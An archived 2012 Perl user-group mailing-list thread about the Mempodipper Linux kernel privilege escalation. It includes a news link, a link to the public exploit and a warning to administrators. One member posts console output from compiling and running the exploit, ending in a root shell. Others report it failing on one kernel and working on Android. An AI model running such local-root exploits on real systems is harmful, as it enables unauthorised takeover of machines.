[SP-pm] [OFF] Linux Kernel Privilege Escalation >= 2.6.39

Oscar Marques oscarbm at gmail.com
Fri Jan 27 06:18:17 PST 2012


Tested and approved.
I tested the Android version and it worked too.
See the thread about this on FB.
It's already old by now :)

2012/1/27 Alexei Znamensky <russoz at gmail.com>

>
> On
>
> Linux alexeiz 2.6.38-13-generic-pae #53-Ubuntu SMP Mon Nov 28 19:41:58 UTC
> 2011 i686 i686 i386 GNU/Linux
>
> it doesn't even compile.
>
> I use VMWare a lot, and the support for VMTools and for the modules that
> compile into the Linux kernel is broken for kernel 3.0 (there are some
> patches around, but I'm not going to compile a kernel right now), so I'm
> using 2.6.38 for now.
>
> Regards,
> Russian
>
> 2012/1/27 Daniel Mantovani <daniel.oliveira.mantovani at gmail.com>
>
>> I just tested it on my VPS,
>>
>>
>> mantovani@mantovanilabs:~$ gcc mempodipper.c
>> mantovani@mantovanilabs:~$ ls
>> a.out  apps  mempodipper.c  Perl  perl5
>> mantovani@mantovanilabs:~$ chmod +x a.out
>> mantovani@mantovanilabs:~$ ./a.out
>> ===============================
>> =          Mempodipper        =
>> =           by zx2c4          =
>> =         Jan 21, 2012        =
>> ===============================
>>
>> [+] Ptracing su to find next instruction without reading binary.
>> [+] Creating ptrace pipe.
>> [+] Forking ptrace child.
>> [+] Waiting for ptraced child to give output on syscalls.
>> [+] Ptrace_traceme'ing process.
>> [+] Error message written. Single stepping to find address.
>> [+] Resolved call address to 0x4020b8.
>> [+] Opening socketpair.
>> [+] Waiting for transferred fd in parent.
>> [+] Executing child from child fork.
>> [+] Opening parent mem /proc/16574/mem in child.
>> [+] Sending fd 6 to parent.
>> [+] Received fd at 6.
>> [+] Assigning fd 6 to stderr.
>> [+] Calculating su padding.
>> [+] Seeking to offset 0x4020ac.
>> [+] Executing su with shellcode.
>> # uname -a
>> Linux mantovanilabs.com 3.0.4-x86_64-linode21 #1 SMP Thu Sep 1 21:28:01
>> EDT 2011 x86_64 GNU/Linux
>>
>>  --
>> Software Engineer
>> Just Another Perl Hacker
>> Daniel Mantovani +5511 8538-9897
>> XOXO
>>
>> On Jan 27, 2012, at 12:02 PM, Daniel Mantovani wrote:
>>
>>
>> http://www.techworld.com.au/article/413300/linux_vendors_rush_patch_privilege_escalation_flaw_after_root_exploits_emerge
>> the exploit, http://www.exploit-db.com/exploits/18411/
>>
>> Attention administrators, this is a serious matter.
>>
>>
>> --
>> Software Engineer
>> Just Another Perl Hacker
>> Daniel Mantovani +5511 8538-9897
>> XOXO
>>
>>
>>
>> =begin disclaimer
>>   Sao Paulo Perl Mongers: http://sao-paulo.pm.org/
>>  SaoPaulo-pm mailing list: SaoPaulo-pm at pm.org
>>  L<http://mail.pm.org/mailman/listinfo/saopaulo-pm>
>> =end disclaimer
>>
>>
>
>
> --
> Alexei "RUSSOZ" Znamensky | russoz EM gmail com | http://russoz.org
> GPG fingerprint = 42AB E78C B83A AE31 7D27  1CF3 C66F B5C7 71CA 9F3C
> http://www.flickr.com/photos/alexeiz | http://github.com/russoz
> "I don't know... fly casual!" -- Han Solo
>
>
>


-- 
Oscar Marques
oscarbm at gmail.com
http://www.dunkelheit.com.br
@f117usbr <https://twitter.com/#%21/f117usbr>
+55 21 9293-9343